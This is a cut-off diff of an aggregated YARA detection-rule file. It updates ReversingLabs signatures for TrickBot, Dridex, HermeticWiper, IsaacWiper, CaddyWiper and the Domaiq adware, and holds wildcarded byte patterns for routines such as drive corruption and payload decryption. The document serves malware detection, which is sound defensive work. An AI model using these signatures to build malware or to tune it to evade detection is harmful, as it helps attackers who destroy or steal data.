+		logic_hash = "e10f16c70f1ff7cf11d3e25f06e4c5d9e20c51688582d2b51322f768a8e06d7e"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "TrickBot"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$entry_setup = {
+            58 (68 | 8B) [6-8] 59 [1-3] E2 ?? 57 8B (C7 | EC) 8B (C7 | EC) 05 ?? ?? ?? ?? 68 [4-5]
+            89 45 [1-2] 8B D7 [3-4] 8B C1 66 AD 85 C0 74 ?? 3B (C1 | C8) (72 | 77) ?? 2B C1 (C1 | D1)
+            [2-4] 8B CF 03 C8 81 C1 ?? ?? ?? ?? 8B 01 59 03 D0 52 EB ?? 89 45 ?? 8B C5 B9 ?? ??
+            ?? ?? C1 E1 ?? 2B C1 8B 00 89 45 ?? 6A ?? 8B D0 59 FF D2 89 68 ?? 6A ?? 8B D0 FF D2
         }
-		$destroy_files_p3 = {
-            89 C7 48 8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 C2 48
-            8B 45 ?? 48 01 D0 48 39 85 ?? ?? ?? ?? 73 ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 29
-            D0 48 8B 55 ?? 48 29 D0 48 89 45 ?? 48 83 7D ?? ?? 7E ?? 48 8B 4D ?? 48 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 48 98 48
-            39 85 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? EB ?? 90 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 83 FB ?? E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89
-            C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48
-            89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ??
-            48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ??
-            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48 8B 5D ?? C9 C3
+		$decrypt_function_snippet = {
+            58 8B C8 75 ?? 58 2B F0 50 8B D8 49 75 ?? 59 58 59 5E 5F 5B C3
+        }
+		$decrypt_function_snippet_wrapper = {
+            55 BD ?? ?? ?? ?? 50 51 52 6A ?? FF 45 ?? 8B 45 ?? 59 F7 E1 8D 8D ?? ?? ?? ?? 03 C8
+            89 4D ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 41 ?? 8F 01 89 79 ?? 89 71 ?? 8B D1 59 89 4A
+            ?? 55 2B C0 8B C8 8B 02 8B F8 58 41 41 41 41 50 2B C1 8B 00 3B C7 72 ?? 58 C1 E9 ??
+            49 89 4A ?? E3 ?? FF 55 ?? 8B 55 ?? 8B 4A ?? FF 55 ?? 50 51 50 6A ?? 59 FF 55 ?? FF
+            D0
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $destroy_files_p* ) )
+		uint16( 0 ) == 0x5A4D and $entry_setup and ( $decrypt_function_snippet or $decrypt_function_snippet_wrapper )
 }
 rule REVERSINGLABS_Win32_Trojan_Isaacwiper : TC_DETECTION MALICIOUS MALWARE FILE
 {
@@ -56872,8 +57364,8 @@ rule REVERSINGLABS_Win32_Trojan_Isaacwiper : TC_DETECTION MALICIOUS MALWARE FILE
 		date = "2022-03-02"
 		modified = "2022-03-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/trojan/Win32.Trojan.IsaacWiper.yara#L1-L76"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/trojan/Win32.Trojan.IsaacWiper.yara#L1-L76"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
 		logic_hash = "c9fa43f44c33816a66f61255d101294da63df1afc5a27ed5817072040cd1eec5"
 		score = 75
 		quality = 90
@@ -56941,91 +57433,18 @@ rule REVERSINGLABS_Win32_Trojan_Isaacwiper : TC_DETECTION MALICIOUS MALWARE FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and ( $enumerate_physical_drives and $corrupt_drive_thread )
 }
-rule REVERSINGLABS_Win32_Trojan_Dridex : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Dridex trojan."
-		author = "ReversingLabs"
-		id = "bc68aca1-69e6-57e6-9277-70c89fda1e5d"
-		date = "2020-09-16"
-		modified = "2020-09-16"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/trojan/Win32.Trojan.Dridex.yara#L1-L80"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7eddc8f33846dfb61302b7d7fddd8dec59a1bde05b14135c14131a02e2c19600"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "Dridex"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$resolve_api_wrapper_1 = {
-            56 57 8B FA 8B F1 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FE ?? ?? ?? ?? 75 ?? 33 C0 5F
-            5E C3 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 8B CE E8 ??
-            ?? ?? ?? 85 C0 74 ?? 8B D7 ?? ?? ?? ?? E9
-        }
-		$resolve_api_wrapper_2 = {
-            57 53 8B FA 8B D9 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FB ?? ?? ?? ?? 74 ?? 8B CB E8
-            ?? ?? ?? ?? 85 C0 74 ?? 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3 8B CB E8 ?? ?? ?? ?? 84
-            C0 74 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB
-        }
-		$resolve_api_wrapper_3 = {
-            55 8B EC 57 8B 7D ?? 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74
-            ?? 56 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ??
-            85 C0 75 ?? 5E 33 C0 5F 5D C2 ?? ?? 57 50 E8 ?? ?? ?? ?? 5E 5F 5D C2
-        }
-		$resolve_api_wrapper_4 = {
-            55 8B EC FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 ?? 56
-            E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 85 C0
-            74 ?? 5E 89 45 ?? 5D E9
-        }
-		$find_first_file_snippet_1 = {
-            53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? [4-6] BA ??
-            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A ?? 8D 56 ??
-            52 53 51 FF D0
-        }
-		$find_first_file_snippet_2 = {
-            57 53 55 8B E9 33 C9 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ??
-            ?? 8B 18 E8 ?? ?? ?? ?? 8B C8 85 C9 74 ?? 33 D2 83 FB ?? 6A ?? 5B 8D 7D ?? 0F 4C DA
-            8B C2 53 52 52 57 0F 9D C0 50 FF 75 ?? FF D1
-        }
-		$find_first_file_snippet_3 = {
-            53 56 8B F1 33 DB 57 32 C9 89 5E ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
-            38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 6A ?? 33 C0 83 FF ?? 59 0F 4C C8 8D 46 ?? 51 53
-            53 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2
-        }
-		$find_first_file_snippet_4 = {
-            53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? 8D 7B ?? 8D
-            5F ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A
-            ?? 8D 56 ?? 52 53 51 CC C3
-        }
-		$find_first_file_snippet_5 = {
-            56 8B F1 32 C9 57 C7 46 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8B 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 33 C0 B9 ?? ?? ?? ?? 83 FF ?? 0F 4C C8 51 50
-            50 8D 46 ?? 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $resolve_api_wrapper_* ) and any of ( $find_first_file_snippet_* ) )
-}
-rule REVERSINGLABS_Win32_Trojan_Hermeticwiper : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Trojan_Caddywiper : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects HermeticWiper trojan."
+		description = "Yara rule that detects CaddyWiper trojan."
 		author = "ReversingLabs"
-		id = "252dfb3d-9d4e-51a4-80c9-64e17922d997"
-		date = "2022-02-24"
-		modified = "2022-02-24"
+		id = "ad437f29-4ad8-5a88-a0b6-03de55e7375f"
+		date = "2022-03-15"
+		modified = "2022-03-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/trojan/Win32.Trojan.HermeticWiper.yara#L1-L50"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0fa519ce8285ffe4e49c2a301e8a0fd0516a05dc6b41ee0b010fdc76dd6e195e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/trojan/Win32.Trojan.CaddyWiper.yara#L1-L95"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "178ff4171c09866f6b303bdff234beff1116d268995ee4dc236332e472d645b1"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
@@ -57033,961 +57452,1139 @@ rule REVERSINGLABS_Win32_Trojan_Hermeticwiper : TC_DETECTION MALICIOUS MALWARE F
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
 		tc_detection_type = "Trojan"
-		tc_detection_name = "HermeticWiper"
+		tc_detection_name = "CaddyWiper"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$corrupt_physical_drive = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 51 68 ?? ?? ?? ?? 0F 57 C0 89 55 ?? 8D 85 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 66 0F D6 45 ?? 33 FF 89 75 ?? 50 0F
-            11 45 ?? 89 7D ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 8D 55 ?? 8D 8D ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ??
-            BF ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 8D 45 ??
-            50 57 56 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ??
-            75 ?? 66 0F 1F 44 00 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 81 C7 ?? ??
-            ?? ?? 33 F6 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 F6 0F 84 ?? ?? ??
-            ?? 8B 06 C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
-            83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 55 ?? 8D 46 ?? 89 45 ?? 66 90
-            8B 00 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? FF 70 ?? FF 70
-            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 81 FA ?? ?? ?? ?? 72 ?? 66 83 7F ??
-            ?? 75 ?? 85 D2 0F B7 C2 B9 ?? ?? ?? ?? 0F 45 C8 66 89 4F ?? 8B 45 ?? FF 70 ?? FF 70
-            ?? FF 75 ?? FF 75 ?? 57 53 FF 55 ?? 8B 55 ?? 8B 4D ?? 8B 45 ?? 41 05 ?? ?? ?? ?? 89
-            4D ?? 89 45 ?? 3B 4E ?? 0F 82 ?? ?? ?? ?? 8B 7D ?? EB ?? FF 15 ?? ?? ?? ?? 33 FF 85
-            DB 74 ?? 83 FB ?? 74 ?? 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 74 ?? 56 6A ??
-            FF D3 8B 35 ?? ?? ?? ?? 50 FF D6 EB ?? FF 15 ?? ?? ?? ?? 8B 7D ?? EB ?? 33 C0 5F 5E
-            5B 8B E5 5D C2 ?? ?? 8B 35 ?? ?? ?? ?? 85 FF 74 ?? 57 6A ?? FF D3 50 FF D6 8B 45 ??
-            5F 5E 5B 8B E5 5D C2
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $corrupt_physical_drive )
-}
-rule REVERSINGLABS_Win32_PUA_Domaiq : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects Domaiq potentially unwanted application."
-		author = "ReversingLabs"
-		id = "44129e4b-7dc2-5af0-b466-80dc4f4d6388"
-		date = "2020-07-28"
-		modified = "2020-07-28"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/pua/Win32.PUA.Domaiq.yara#L1-L169"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e291a639aa027a2257eec2853e40a222afabf23b32898326a1d5b48be823202c"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "PUA"
-		tc_detection_name = "Domaiq"
-		tc_detection_factor = 1
-		importance = 25
-
-	strings:
-		$payload = "PEFxdWlFbXBpZXphRWxQYXlsb2FkPg"
-		$NSIS_CheckIntegrity = {
-            57 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 75 ?? 6A 1C 8D 45
-            D8 53 50 E8 ?? ?? ?? ?? 8B 45 D8 A9 F0 FF FF FF 75 ?? 81 7D DC EF BE AD DE 75 ?? 81
-            7D E8 49 6E 73 74 75 ?? 81 7D E4 73 6F 66 74 75 ?? 81 7D E0 4E 75 6C 6C 75 ?? 09 45
-            08 8B 45 08 8B 0D ?? ?? ?? ?? 83 E0 02 09 05 ?? ?? ?? ?? 8B 45 F0 3B C6 89 0D ?? ??
-            ?? ?? 0F 8F ?? ?? ?? ?? F6 45 08 08 75 ?? F6 45 08 04 75
-        }
-		$NSIS_ErrorPart = {
-            81 EC ?? ?? ?? ?? 53 55 56 33 DB 57 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C6 44
-            24 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A
-            ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 8D 44 24 ?? 68 ?? ?? ?? ?? 50 53
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? BF ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 8B C7 75
-        }
-		$UPX_Decompression = {
-            8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? B8 ?? ?? ?? ?? 01 DB 75 ??
-            8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 48 01 DB 75
-        }
-		$UPX_Encrypting = {
-            31 C0 8A 07 30 D8 04 ?? 2C ?? 88 07 47 39 CF 75
-        }
-		$dumping_functionv2014 = {
-            55 8B EC 83 EC ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84
-            ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            89 45 ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 8B 45 ??
-            53 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ??
-            56 6A ?? 6A ?? 8B D8 6A ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 6A ?? 6A ?? 6A
-            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 8B F8 52 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 5F 5B 5E 8B E5 5D C3
-        }
-		$dumping_functionMidVersion = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33
-            DB BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 89 75 ?? 89 5D ?? 88 5D ?? FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8B CF 8D 41 ?? 8A 11 41 3A
-            D3 75 ?? 2B C8 51 57 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            83 EC ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ??
-            ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ??
-            ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 45 ?? 89 71 ?? 89
-            59 ?? 50 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ??
-            89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A
-            ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8B C4 89 65 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
-            ?? ?? 8B 7D ?? BE ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 73 ?? 8D 7D ?? 68 ?? ?? ?? ?? 8D 55
-            ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 40 ?? EB ?? 83 C0 ?? 8B
-            4D ?? 57 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 39 75 ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 33 C0
-            5B E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$dumping_functionE = {
-            52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 5? FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 BD ?? ?? ?? ?? ?? 75 ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52
-            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF
-            15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8
-        }
-		$dumping_functionP = {
-            50 57 56 FF 15 ?? ?? ?? ?? 8B F8 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 56
-            89 45 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? 57 56 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A
-            ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8B D8 8D 45 ?? 50 FF 75 ?? 89 75 ??
-            FF 75 ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15
-        }
-		$dumping_functionB = {
-            52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ??
-            ?? ?? ?? F3 A5 A4 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 A4
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95
-            ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? E8
-        }
-		$dumping_function111 = {
-            68 ?? ?? ?? ?? 8D 55 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 39 58 ?? 72 ?? 8B 40 ?? EB
-            ?? 83 C0 ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 5D ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8
-        }
-		$dumping_function2 = {
-            55 8B EC 51 53 8B 5D ?? 56 68 ?? ?? ?? ?? 8D 45 ?? 53 50 33 F6 E8 ?? ?? ?? ?? 8B 4D
-            ?? 68 ?? ?? ?? ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            83 F8 ?? 74 ?? 57 8B 7D ?? 0F BE 14 3E 8B 4D ?? 51 33 D0 52 E8 ?? ?? ?? ?? 8B C7 83
-            C4 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 8D 4E ?? 8B D1 2B D0
-            8B 45 ?? F7 DA 1B D2 23 D1 50 8B F2 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 5F 8B 4D
-            ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B 8B
-            E5 5D C2
-        }
-		$lib_loader = {
